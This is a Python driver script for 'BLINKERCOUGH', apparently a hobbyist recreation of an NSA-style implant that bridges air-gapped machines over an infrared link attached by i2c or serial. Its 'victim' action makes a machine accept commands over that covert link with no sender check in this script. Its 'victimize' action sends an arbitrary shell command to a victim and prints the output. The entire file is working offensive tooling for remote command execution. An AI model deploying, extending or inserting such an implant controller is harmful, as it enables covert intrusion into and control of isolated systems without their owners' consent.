#!/usr/bin/python
#
# BLINKERCOUGH: NSA Playset implant for IR bridging of airgap
#
# Copyright (C) 2015 Hacker, J.R. <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from blinkercough import *
import sys
import os
import re
def output_hook(output):
    """Print *output* to stdout.

    The 'victimize' action installs this as ``CommandRunner.output_hook``.
    """
    print(output)
def terminated_hook(code):
    """Print the exit code reported for a finished command.

    The 'victimize' action installs this as ``CommandRunner.terminated_hook``.
    """
    # Wrapping code in a 1-tuple keeps %-formatting safe if code is itself a tuple.
    print("command exited with exit code %s" % (code,))
def print_hook(source, packet):
    """Print the sender of a received packet followed by its bytes in hex.

    The 'listen' action installs this as ``BlinkerCough.receive_hook``.
    """
    print("packet from %s" % (source,))
    # NOTE(review): binascii is not imported by this file; presumably it is
    # re-exported through `from blinkercough import *` -- confirm.
    hex_dump = binascii.hexlify(packet)
    print(hex_dump)
# Both positional arguments (device, action) are mandatory; bail out early
# with a usage line when either is missing.
if len(sys.argv) <= 2:
    print("usage script <i2c bus or serial tty> <action>")
    sys.exit(1)
def convert(value):
    """Parse a command-line address string into an int, exiting on failure.

    A value that begins with a hex digit is parsed as base 16 (so "10" is
    16 and "0x10" is also 16). Any other value is parsed with base 0, which
    lets int() infer the base from a prefix (e.g. "+0x10", "-5").

    On a ValueError the function prints a message and calls sys.exit(1);
    it never returns in that case.
    """
    # NOTE(review): re.match only anchors at the start of the string, so this
    # tests the first character(s), not the whole value. Input such as
    # "12zz" is routed to base 16 and then rejected by int().
    radix = 16 if re.match(r'[\da-fA-F]+', value) else 0
    try:
        return int(value, radix)
    except ValueError:
        print("can't convert '%s' to int" % value)
        sys.exit(1)
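# Choose the transport from the first argument: an integer selects an i2c
# bus, anything else is treated as a serial tty name.
dev = sys.argv[1]
devtype = None
BC = None
try:
    bus_number = int(dev)
except ValueError:
    # Not an integer, so it must be a serial device.
    devtype = 'serial'
    # 115200 is passed as SerialDevice's second argument (presumably the
    # baud rate -- confirm against blinkercough).
    BC = BlinkerCough(SerialDevice(dev, 115200))
else:
    # Construction happens outside the try block on purpose: a ValueError
    # raised while opening the i2c device must surface as an error instead
    # of being mistaken for "argument is not a number" and silently
    # falling back to the serial path.
    devtype = 'i2c'
    BC = BlinkerCough(i2cDevice(bus_number))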
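def _poll_forever(bc):
    """Poll *bc* every half second, printing a progress dot, until interrupted."""
    while True:
        bc.poll()
        # NOTE(review): `time` is not imported by this file; presumably it is
        # re-exported through `from blinkercough import *` -- confirm.
        time.sleep(0.5)
        sys.stdout.write(".")
        sys.stdout.flush()


# Dispatch on the second positional argument. Every branch except
# getaddr/setaddr ends in an endless poll loop, so the script runs until it
# is killed.
action = sys.argv[2]
if action == 'getaddr':
    addr = BC.get_address()
    print("blinker cough address is: 0x%04x" % addr)
elif action == 'setaddr':
    if len(sys.argv) != 4:
        print("didn't supply address")
        sys.exit(1)
    raw_addr = sys.argv[3]
    # Decimal is tried first so existing invocations keep their meaning.
    # The base-0 fallback additionally accepts the 0x... form that getaddr
    # prints. Malformed input exits with a message instead of a traceback.
    # NOTE(review): the other actions parse addresses with convert(), which
    # treats bare digits as hex; setaddr treats them as decimal.
    try:
        new_addr = int(raw_addr)
    except ValueError:
        try:
            new_addr = int(raw_addr, 0)
        except ValueError:
            print("can't convert '%s' to int" % raw_addr)
            sys.exit(1)
    BC.set_address(new_addr)
elif action == 'sendstuff':
    # Destination defaults to address 0 when none is given.
    to = 0
    if len(sys.argv) == 4:
        to = convert(sys.argv[3])
    # Fixed 120-byte test payload: an 8-byte prefix, 0xff filler up to
    # byte 119, then a final 0xf0. It is identical for every packet, so it
    # is built once.
    stuff = '\xFE\xED\xFA\xCE\xDE\xAD\xBE\xEF'
    stuff += '\xff' * (119 - len(stuff)) + '\xf0'
    # NOTE(review): the listing lost its indentation; send + poll_for are
    # assumed to both sit inside the loop -- confirm against the repository.
    for i in range(0, 5):
        print("sending packet %d to: 0x%04x" % (i, to))
        BC.send(to, stuff)
        BC.poll_for(35)
    _poll_forever(BC)
elif action == 'listen':
    # The hook is set on the class, so it applies to every BlinkerCough
    # instance in the process.
    BlinkerCough.receive_hook = staticmethod(print_hook)
    print("waiting for packets at address 0x%04x" % BC.address)
    sys.stdout.write("polling...")
    sys.stdout.flush()
    _poll_forever(BC)
elif action == 'victim':
    print("playing the victim at address 0x%04x" % BC.address)
    CR = CommandRunner(BC)
    # NOTE(review): every packet the link delivers is passed to CR.on_recv,
    # and this script applies no sender check first. How CommandRunner
    # validates or acts on packets is not visible here and should be
    # reviewed in blinkercough.
    BlinkerCough.receive_hook = CR.on_recv
    CommandRunner.send_hook = BC.send
    sys.stdout.write("polling...")
    sys.stdout.flush()
    _poll_forever(BC)
elif action == 'victimize':
    if len(sys.argv) != 5:
        print("victimize requires victim and cmd")
        sys.exit(1)
    victim = convert(sys.argv[3])
    # The command string is taken from argv and passed on unchanged.
    cmd = sys.argv[4]
    print("victim: 0x%04x cmd '%s'" % (victim, cmd))
    CR = CommandRunner(BC)
    BlinkerCough.receive_hook = CR.on_recv
    CommandRunner.send_hook = BC.send
    CommandRunner.output_hook = staticmethod(output_hook)
    CommandRunner.terminated_hook = staticmethod(terminated_hook)
    CR.run_remote_command(victim, cmd)
    _poll_forever(BC)
else:
    print("I don't action '%s'" % action)
    print("actions available:")
    for known_action in (" getaddr", " setaddr", " sendstuff",
                         " listen", " victim", " victimize"):
        print(known_action)
    sys.exit(1)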